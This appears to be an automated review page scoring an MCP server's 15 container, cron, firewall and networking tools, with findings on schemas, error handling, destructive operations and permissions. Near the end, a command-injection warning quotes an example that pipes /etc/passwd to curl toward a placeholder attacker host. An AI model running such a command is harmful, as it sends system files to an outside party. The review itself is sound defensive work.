Static source inference · medium confidence · evidence: Streamable HTTP
Current-spec patterns detected
Summary
The server defines 15 tools with clear names and basic input schemas. However, there are significant gaps in output schema documentation, error handling guidance, and parameter completeness. Tool names follow verb_noun convention well (get_cpu_usage, list_containers, create_container, etc.). Descriptions are present but often minimal (under 100 chars), lacking context about when to use each tool or what happens on failure. Input schemas declare types and provide brief descriptions, but parameters lack constraints (enums, ranges, patterns). Error handling is generic exception-catching with minimal recovery guidance. Output schemas are not formally documented, responses are inferred from code inspection.
Tools (15)
container_logsread onlysource verified73/100
Get the last N log lines from a container.
create_containerwritesource verified70/100
Create and start a container from an image.
create_crontab_taskwritesource verified63/100
Append a cron entry to the user's crontab. Requires writable crontab mount on host.
create_virtual_ipwritesource verified62/100
Add a virtual IP to an interface. Requires NET_ADMIN and host networking to affect the host.
Output schemas not documented. Code returns dicts with varying structure (e.g., {'usage_percent': ...} vs {'containers': [...]} vs {'error': ...}). LLMs cannot predict response format, complicating downstream planning and field extraction.
Generic error handling. All tools catch exceptions and return {'error': str(e)}. No recovery guidance, no error classification (retryable vs user-fixable vs fatal), no suggestion for next steps. LLMs receive 'error: Connection refused' with no indication whether to retry, ask user, or try alternate tool.
Document output schemas for all 15 tools. For each, specify the success response structure (field names, types, nullable fields) and the error response structure. Example: get_cpu_usage returns {usage_percent: float (0-100)}, or {error: string} on failure.
Add recovery guidance to all error paths. Replace generic exception-catching with specific error messages. E.g., 'Container "myapp" not found. Call list_containers() to see available containers.' or 'Docker daemon not running. Check Docker service status and retry.'
Declare enums for constrained parameters. iptables_rule.protocol should be Enum['tcp', 'udp']; iptables_rule.action is already Literal['add', 'remove'], document as such. Document port range (1-65535) and tail/count ranges (1-10000).
Expand tool descriptions to 100-150 characters and include differentiation. E.g., 'Restart a container (stop + start atomically). Faster than manual stop/start; does not lose container state. Differs from delete_container, which removes the container entirely.'
Implement dry-run for destructive tools. Add optional confirm=False parameter to delete_container, create_crontab_task, and iptables_rule. When confirm=False, return 'This will DELETE container "name". Call again with confirm=True to proceed.' This mirrors multi-round-trip requests (MCP 2026-07-28 'input_required' result).
Add tool annotations (FastMCP support via metadata). Mark delete_container and iptables_rule with destructiveHint=True; mark all read-only tools (get_*, list_*, inspect_*, network_test) with readOnlyHint=True.
Score history
Overall score trend
↑ 19 points across a rubric change (v1 → v2)
71/100
Scored
Grade
Overall
Spec posture
Rubric
2026-09-22
B
71
2026-07-28+
v2
2026-03-09
D
52
-
v1
read only
source verified
70/100
Return low-level information about a container.
iptables_rulewritesource verified65/100
Add or remove an iptables ACCEPT rule on INPUT for a port/protocol. Requires NET_ADMIN.
Missing parameter constraints. Numeric params (tail: 100, count: 4, timeout: 10, port: integer) lack min/max bounds. String params (name, image, command) have no length, format, or character restrictions documented. LLMs can pass absurd values (tail: 1000000, port: 99999) that break downstream APIs or cause timeouts.
Descriptions lack LLM-optimized guidance. Most tool descriptions are 30-70 chars, stating only WHAT the tool does, not WHEN to use it, WHEN NOT to use it, or what makes it different from related tools. E.g., 'Restart a container by name' doesn't explain it differs from stop + start, or when to prefer it.
No confirmation pattern for destructive operations. delete_container, create_crontab_task, and iptables_rule are irreversible but execute immediately with no dry-run, confirmation, or undo tooling. Agents are prone to mistakes, a single hallucinated call could delete critical containers or break firewall rules.
Missing tool annotations. Tools lack readOnlyHint, destructiveHint, and idempotentHint annotations (MCP 2026-07-28 feature). This leaves clients unable to warn users before destructive operations or optimize read-only tool caching. delete_container and iptables_rule should be annotated as destructive; get_cpu_usage as read-only.
Privileged operations lack permission checks. create_virtual_ip and iptables_rule require NET_ADMIN capability, but no permission validation or user authorization checks occur before execution. Code comments acknowledge the requirements but do not enforce them, risking unintended privilege escalation.
No pagination for list_containers and list_files. If a user has hundreds of containers or files, responses return all items at once, risking context window exhaustion. No limit, offset, or next_cursor mechanism.
Response bloat. inspect_container returns c.attrs (full low-level Docker metadata) without filtering. This could be hundreds of fields (network settings, volumes, mounts, environment vars, etc.), wasting tokens and diluting signal for the LLM.
Missing chaining IDs. create_container returns id and name, but not image tag or status. container_logs returns name and logs, but not container ID for downstream operations. This forces agents to call list_containers or inspect_container again to get missing IDs for chaining.
create_containercontainer_logs
Implement permission checks. Before executing create_virtual_ip and iptables_rule, verify the calling environment has NET_ADMIN. If running in Docker, check that the container was started with --cap-add=NET_ADMIN. Return 'Permission denied: NET_ADMIN capability required. Run container with --cap-add=NET_ADMIN' if missing.
Add pagination to list_containers and list_files. Accept optional limit (default 20, max 100) and offset/cursor parameters. Return {items: [...], total: N, has_more: bool} so LLMs can request next pages.
Filter inspect_container output. Instead of returning c.attrs (100+ fields), return only essential fields: {id, name, status, image, created, state, ports, volumes, env (first 10)}. Provide a separate inspect_container_full tool for power users who need unfiltered metadata.
Enrich responses with chaining IDs. create_container should return {created: bool, id: string, name: string, image: string, status: string}. container_logs should return {..., container_id: string, status: string}. This enables downstream tool calls without extra lookups.
Add idempotency hints. Document which tools are idempotent (safe to retry): start_container (no-op if already started), list_containers, get_cpu_usage, etc. Conversely, document non-idempotent tools (create_container produces duplicates on retry; iptables_rule can add duplicate rules).
Implement command injection protection. create_crontab_task constructs shell commands from user input (schedule + command). Sanitize or use subprocess with shell=False and argument array. Document the risk: if an agent passes command='cat /etc/passwd | curl attacker.com?data=', it could exfiltrate data.
Add rate limiting hints. Document that agents calling these tools in tight loops (e.g., repeatedly calling get_cpu_usage) may impact system performance. Recommend sampling intervals (minimum 1 second between calls) or batch operations where available.